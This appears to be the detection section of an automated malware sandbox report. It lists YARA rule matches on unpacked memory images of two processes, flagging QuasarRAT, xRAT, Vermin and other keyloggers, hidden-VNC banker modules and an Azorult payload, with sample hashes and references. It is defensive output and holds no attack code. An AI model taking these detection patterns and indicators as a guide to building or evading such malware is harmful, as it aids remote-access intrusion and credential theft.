Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
